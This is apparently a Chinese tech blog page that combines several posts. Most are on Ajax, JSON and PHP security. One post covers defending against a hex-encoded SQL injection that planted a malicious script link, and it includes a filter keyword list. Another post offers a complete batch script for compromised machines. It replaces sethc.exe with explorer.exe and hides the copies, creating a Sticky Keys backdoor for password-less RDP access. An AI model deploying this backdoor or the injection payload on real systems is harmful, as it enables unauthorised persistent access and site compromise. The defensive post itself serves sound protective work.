无风的港湾

最近我的网站经常把js脚本注入到数据，清除了又来。先后在网上找了很多的方法，还是没有用的，十分恼火。

首先先告诉大家一个批量清除代码的sql语句。

update 表名 set 字段=replace(字段,’script src=http://3b3.org/c.js>
1、分析那些无聊的人，或者有些病态的人究竟做了些什么 。

通过iis的日志或者microsoft urlscan 日志查看，在一些通过id查询数据库内容的时候后面被人加了一段很长的字符窜。

%%3B%%44%%65%%43%%4C%%61%%52%%45%%类似这样的字符窜，一定是其他的方式编码

首先我们先用工具分析下如此之长的字符窜究竟包含了些什么内容。

通过批量替换工具把%%全部替换成空，然后把得到的字符串通过其他的转码工具，转成字符窜。

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0×45这里代码去掉了06F007200 aS NvArChAR(4000));ExEc(@S);–

就是一段与通过id查询数据库同时执行的sql，就给数据库某些表的字段加入了js病毒连接。

2、所以我们的原来的防sql注入的字符串就需要升级了。

如果过滤16进制

; 对应 3B

DeCLaRE 对应 4465434C615245

@ 对应 40

NvArCHaR 对应 4E76417243486152

set 对应 536554

CaSt 对应 43615374

as 对应 6153

exec 对应 45784563

- 对应 2D

把16进制的代码用|隔开放到injdata 里面

injdata = “3B|2D|’|;|and|exec|insert|select|delete%20from|update|count|”

然后自己测试下，程序是否拦击了这些16进制的代码，本人测试过是可以拦击的，如果不加入这些是不拦击的

照样可以注入到数据库。

标签Tags：ASP, js, sql, url, 人, 代码, 工具, 数据, 数据库, 方法, 服务器构建&安全, 程序, 类, 网站, 诫, 连接, 防注入

相关日志

• 基于JSON的高级AJAX开发技术 (0)
• 最令PHP初学者头痛的十四个问题 (0)
• 使用Ajax时的十个常犯的错误 (0)
• Rsync详解 (0)
• php的文档句法(heredoc)<<<和PHP字符串操作 (0)

来源：脚本安全小组

在肉鸡上执行命令

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

以后再连接肉鸡3389，敲5下shift键就可以直接进入了，无需输入密码，只是登陆上去没有任务栏，一直会有密码登陆框，不过够我们做很多事情了,目前win2003测试通过。

似乎2000也可以，XP不行。这两个系统没测试。

不知道有牛人知道是什么道理不.

小道消息：连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ，你把explorer.exe换成sethc.exe 就是自动执行explorer.exe

Shift后门TT整理版
来源：TT’s Blog

将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~

然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe

或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~

哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕！
echo.
echo 感谢您使用Shift后门
echo.
echo.
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

标签Tags：cache, title, 人, 代码, 密码, 感谢, 方法, 服务器构建&安全, 系统, 连接

相关日志

• mysql优化及全文搜索 (0)
• Rsync详解 (0)
• 数据服务器的设计 (0)
• 思维的惯性 (0)
• 多进程的游戏服务器设计 (0)

AJAX bandwagon是个好去处。它带给你更快、更高效、更强动态的应用。但它也有自身的缺陷。

初一看，具备一些常识似乎就能避免这些缺陷，在一定程度上，的确如此。但从DHTML起源来看，AJAX应用程序充满了结构性差异。不论你在应用程序开发工作中掌握了多少常识，从别人犯的错误中吸取教训也是有好处的。我们称这些错误为“七宗死罪”，但它们不能代表全部的错误。

事实上，在你犯这些致命过失之前，你可能首先犯了一些较轻的错误。因此我们从这里着手。这是每个人都可能犯的错误。这些错误是多么普遍，通过Google搜索一下，你就可以发现大部分的错误。
(全文…)

标签Tags：ajax, dhtml, google, html, javascript, JavaScript&Ajax, url, 人, 应用程序, 搜索, 新手, 方法, 更新, 浏览器, 程序, 网络编程, 自身, 设计, 诫, 链接, 错误, 页面

相关日志

• ajax的缺点 (0)
• 基于JSON的高级AJAX开发技术 (0)
• 使用Ajax时的十个常犯的错误 (0)
• Ajax的工作原理 (0)
• 《高性能网站建设指南》读书笔记 (0)

Ajax控件和类库现在真的太多了，不知不觉中增加了Ajax的神秘性和复杂性，看到版内很多人为此费解和伤神，决定发此贴谈谈本人对Ajax的观点，希望能让大家对Ajax有一个本质的认识。

　　观点一：Ajax和服务器端技术毫不相关

　　严格的说，与传统web开发相比，Ajax是完完全全的客户端技术。由于很多控件封装了客户端和服务器端的通信过程，因此很多问题也因通信而起。事实上，不论何种Ajax技术，服务器端都是返回的一个纯文本流，再由客户端来处理这个文本。这段文本可以是xml格式，也可以是一个Html片段，也可以是一段JavaScript脚本，或者仅是一个字符串。服务器端仅仅是作为一个数据接口，客户端使用XMLHttpRequest对象来请求这个页面，服务器端在页面内写入结果文本，这个过程和普通的web开发没有任何区别。所不同的只是，客户端在异步获取结果后，不是直接显示在页面，而是由客户端的Javascript脚本处理后再显示在页面。至于各种控件所谓的能返回DataSet对象，Date对象，或者其他的数据类型，都是封装了这个处理过程的结果。

　　观点二：DOM模型是Ajax最本质的技术

　　之所以没有把XMLHttpRequest列为最本质的技术，因为本人觉得它实在是太简单了，它只是可以让浏览器在后台请求一个页面，并将其内容交给JavaScript处理。真正的核心应该是：DOM模型，即文档对象模型。在DOM模型里，Html标记都被认为是一个对象，例如：div对象，table对象等等。DOM模型就规定了这些对象所具有的属性、方法和事件。通过这些性质，可以对一个已经显示于浏览器的页面进行内容的修改，例如增加节点、修改节点位置，删除节点等等。而不仅仅是一个innerHTML属性这么简单，虽然这是一个很有用的属性。

　　观点三：在使用Ajax控件前理解它们的实现

　　使用Ajax控件的确可以提高效率，但如果你空中楼阁般使用控件，那就得不偿失了。从一个控件换到另外一个控件又会有一个漫长的学习曲线。所以应该从底层了解其，况且Ajax实在不是什么高深的技术。其实任何东西的最底层其实都是简单的，但如果封装了这些底层的东西，事情会变得复杂和难以理解。以Asp.net为例，它的定制特性可以使得只要在方法前加上[ajax method]类似这样的标志就可以称为一个异步方法，相信这使得Asp.net的Ajax开发显得更加“高效”或者是“神秘”，而更多的事情则被封装了。同样记住一条，任何对服务器端的请求仅仅是返回纯文本，我们不一定要依赖于封装好的处理过程，而完全可以自己来实现。

　　观点四：学好JavaScript

　　在大多数人看来，JavaScript总不是那么一种正规的语言，随便copy一段就碰巧能运行，学过c之类的人，一看也能看懂，而且在浏览器中常常有脚本错误提示，所以潜意识觉得总不能付之以大任。事实上，要学好Ajax，这就完全是一种错误的看法。javascript作为一种脚本语言，其语法的确不是很严格，但并不妨碍其完成诸多复杂的任务，没有JavaScript，就没有Ajax。所以本人强烈建议，学Ajax前，一定要好好研究一番JavaScript，一般来讲，如果能顺利看懂prototype框架的代码（如：prototype-1.3.1.js），你的JavaScript水平就基本过关了。同时对DOM模型也可以算有一个基本的了解。

　　观点五：Ajax点缀：CSS

　　用JavaScript控制CSS其实很简单，基本上每个DOM对象都有一个style对象，只要把css属性里的”-”去掉，并让随后的字母变为大写就可以作为属性使用了，例如：element.style.backgroundColor=”#f00″;在css是：选择符 {background-color:#f00}

　　一口气说这么多，希望对大家有点用处。

标签Tags：ajax, ASP, asp.net, css, div, html, javascript, JavaScript&Ajax, js, web, xml, xmlhttp, 人, 代码, 区别, 对象, 属性, 接口, 数据, 方法, 浏览器, 类, 网络编程, 节点, 获取, 错误, 页面

相关日志

• XMLHTTP对象封装技术 (0)
• 基于JSON的高级AJAX开发技术 (0)
• 使用Ajax时的十个常犯的错误 (0)
• Ajax的工作原理 (0)
• ajax的缺点 (0)

上个月我发现许多Web2.0网站大量运用了ajax，但是其中有些很奇怪，因为他们的速度比起前慢了，并且有时候不起作用（在移动设备上），我总结了十条用Ajax的错误（平台无关）

1、 不要通过把整个页面都放在UpdatePanel中更新整个页面。在你运行网页时需要节省时间，不要更新那些可以用javascript and DHTML (DOM)的部分。

2、 要始终记得有这么几种访问者，他们不能用JavaScript或者用的版本比较老的浏览器或者他们对JavaScript支持不好，比如说移动设备。如果这些都不支持，你的访问者能看到什么？

3、 在客户端浏览器缓存相同的请求或者在we服务器端执行缓存。最好的例子是自动完成个下拉菜单，他们的填充在任何时刻都是相同的，一个有错误写法的自动完成的写法可以减慢你的Web服务器（数据库服务器），因为那样会有比起以前用IsPostBack更多地请求。想一下不停的按F5刷新你的网页的情形。如果你有层叠的下拉菜单你就会结算更多地请求。

4、 在你运用CSS或JavaScript时，不要运行，并发的或者运行很长时间的Ajax请求，一般的浏览器只能有两个并发的http连接（我知道可以给变这个，但是默认的还是设为两个）。如果在读取图片的时候由很多Ajax请求的话，速度会变得很慢。

5、 什么时候都用异步调用的方法发送XMLHttpRequest.。如果你要用同步的方法也是没有请问题的，你的浏览器不会因为网络问题或是连接速度慢而冻结的

6、 试着让你的web应用使用一个很慢的网络连接，再尝试用快的TCP/IP连接

7、 你的web应用是作为桌面程序的替代品？你注意观察过一般浏览器在运行你的Web应用一小时，两小时或者几天时内存的使用。不是所有人都有你那样好的机器。

8、 检查在你返回XMLHttpRequest时你的http请求状态代码（status code），那会有一些常见的网络错误像是不可获得的DNS，Http Server error 500 ，你曾经检查过状态代码（status code），它可以告诉你浏览器在一个为连接的模式

9、 试着禁止XMLHttpRequest object！用IE7你能用native object代替ActiveX object，但是你也可以禁止native object。

10、检查你AJAX requests的安全性！你简单的打开了你的数据访问层吗？充分运用FormsAuthentication和PrincipalPermissions。是不是任何人都可以建立一个请求（不只是点击一个链接）？

标签Tags：ajax, code, css, dhtml, html, http请求状态, ie, javascript, JavaScript&Ajax, server, status, web, web2.0, xml, xmlhttp, 人, 代码, 图片, 数据, 数据库, 方法, 更新, 浏览器, 版本, 程序, 网站, 网络编程, 连接, 链接, 错误, 页面

相关日志

• ajax的缺点 (0)
• Ajax的工作原理 (0)
• 基于JSON的高级AJAX开发技术 (0)
• AJAX的各种控件和类库 (0)
• Rsync详解 (0)

做一个项目用到Ajax,开始觉得挺好，后来发现一个问题，例如删除一项，恢复之后就不能再接着删除，必须要等一段时间，后来知道是IE缓存的问题。

　　AJAX缓存页面是一个刚接触AJAX的人一定会遇到的问题，造成这个问题的关键性人物又是IE…

　　在网上找了好多资料后，总结一下

　　1:在AJAX请求的页面后加个随机函数,我们可以使用随机时间函数

　　在javascript发送的URL后加上t=Math.random() ，当然，不是直接把t=Math.random()拷贝到URL后面,应该像这样:URL+”&”+”t=”+Math.random();

　　2:在XMLHttpRequest发送请求之前加上XMLHttpRequest.setRequestHeader(“If-Modified-Since”,”0″)

　　一般情况下,这里的XMLHttpRequest不会直接使用，你应该可以找到这样的代码

XXXXX.send(YYYYYY);

　　那么,就把它变成

XXXXX.setRequestHeader(“If-Modified-Since”,”0″);
XXXXX.send(YYYYYY);

　　第二种方法感觉挺好。

标签Tags：ajax, ie, javascript, JavaScript&Ajax, mod, url, xml, xmlhttp, 人, 代码, 函数, 方法, 网络编程, 页面

相关日志

• Ajax的工作原理 (0)
• 使用Ajax时的十个常犯的错误 (0)
• 基于JSON的高级AJAX开发技术 (0)
• XMLHTTP对象封装技术 (0)
• AJAX的各种控件和类库 (0)

Ajax技术的实现主要依赖于xmlhttprequest，但我们在调用其来进行异步数据的传输时，由于xmlhttp是个短线过程（处理事件完成后就销毁）如果不对该对象进行包装处理的话，就不得不在需要调用的地方重新构建xmlhttprequest，每次调用都要写一大段的代码，实在不是个好办法。好在现在很多开源的ajax框架都提供了对xmlhttp封装的方案。这里以ajaxtags自带的prototype-1.4.0.js为母版，来看看如何将xmlhttp对象封装成一个可复用的方法。

在prototype.js中，首先定义了一个变量：Ajax
var Ajax = {
getTransport: function() {
return Try.these(
function() {return new ActiveXObject(‘Msxml2.XMLHTTP’)},
function() {return new ActiveXObject(‘Microsoft.XMLHTTP’)},
function() {return new XMLHttpRequest()}
) || false;
},

activeRequestCount: 0
}

变量返回了一个xmlhttprequest，可以看到，如果我们调用了Ajax.getTransport()，每次都会返回一个新的xmlhttprequest对象。
(全文…)

标签Tags：ajax, code, div, html, JavaScript&Ajax, js, url, xml, xmlhttp, 中文, 人, 代码, 初始值, 区别, 对象, 属性, 数据, 方法, 网络编程, 获取, 表单, 诫, 错误, 页面

相关日志

• AJAX的各种控件和类库 (0)
• 基于JSON的高级AJAX开发技术 (0)
• Ajax的工作原理 (0)
• 使用Ajax时的十个常犯的错误 (0)
• ajax的缺点 (0)

下面是我对一部分缺陷的看法：

为Ajax而Ajax(Using Ajax for the sake of Ajax.)

很同意这点，当一个技术本身的生存意义由于它自身的亮点而被抹杀，不知道是这个技术的幸运还是不幸。

干掉了back按钮(Breaking the back button)

back按钮是一个标准的web站点UI的重要功能。然后，后退按钮没法和js很好的合作……
gmail似乎作的很好？不过没去仔细看过gmail如何实现后退和js相容的，被这个mistake一提醒，也许这也是ue的一个切口哦。

点击的时候没有提供一个可视化的提示(Not giving immediate visual cues for clicking widgets)

……也许是我没看懂，觉得写这段的人自相矛盾。。他说没提供可视化提示，不过是拿gmail右上角的红色提示作为例子。 (全文…)

标签Tags：ajax, code, google, html, ie, javascript, js, PHP, web, 人, 代码, 兼容, 可用性, 应用程序, 收藏, 数据, 方法, 浏览器, 版本, 程序, 系统, 网络编程, 自身, 解决, 诫, 链接, 错误, 页面

相关日志

• 使用Ajax时的十个常犯的错误 (0)
• 基于JSON的高级AJAX开发技术 (0)
• Ajax的工作原理 (0)
• AJAX应用程序开发七宗罪 (0)
• 最令PHP初学者头痛的十四个问题 (0)

一、 引言

　　毫无疑问，AJAX已经成为当今Web开发中一种强有力的用户交互技术，但是它的许多可能性应用仍然鲜为人知。在本文中，我们将来共同探讨如何使用JavaScript对象标志(JSON)和JSON分析器在服务器和客户端AJAX引擎之间创建复杂而强有力的JSON数据传输层。我们将详细讨论如何创建一组对象(在其它语言中经常被当作一个包)，如何把这些对象串行化为JSON以发送到服务器端，以及如何把服务器端JSON反串行化为客户端JavaScript对象。

　　提示：你可以在Douglas Crockford的网站上找到本文中使用的JSON分析器。

　　在继续阅读前，本文假定你已经掌握了JavaScript技术并且了解如何创建一个基本的AJAX引擎，并经由AJAX技术向服务器端发出请求和从服务器端接收响应。为了更好地理解本文中示例，你需要下载本文相应的源码文件。 (全文…)

标签Tags：ajax, div, html, javascript, js, mod, PHP, url, web, xml, 人, 代码, 分离, 对象, 属性, 应用程序, 数据, 数据库, 方法, 浏览器, 程序, 类, 网站, 网络编程, 自身, 诫, 链接, 面向对象

相关日志

• ajax的缺点 (0)
• Ajax的工作原理 (0)
• AJAX的各种控件和类库 (0)
• 使用Ajax时的十个常犯的错误 (0)
• XMLHTTP对象封装技术 (0)

在指南的开始，我们说过数据过滤在任何语言、任何平台上都是WEB应用安全的基石。这包含检验输入到应用的数据以及从应用输出的数据，而一个好的软件设计可以帮助开发人员做到：

确保数据过滤无法被绕过，确保不合法的信息不会影响合法的信息，并且识别数据的来源。

关于如何确保数据过滤无法被绕过有各种各样的观点，而其中的两种观点比其他更加通用并可提供更高级别的保障。
(全文…)

标签Tags：html, include, mod, PHP, PHP, PHP安全, url, web, 人, 代码, 判断, 数据, 方法, 程序, 类, 网络编程, 表单, 设计, 诫, 软件, 邮件, 重定向, 错误, 验证

相关日志

• 最令PHP初学者头痛的十四个问题 (0)
• 基于JSON的高级AJAX开发技术 (0)
• Rsync详解 (0)
• XMLHTTP对象封装技术 (0)
• Webshell下破解计算机管理员密码 (0)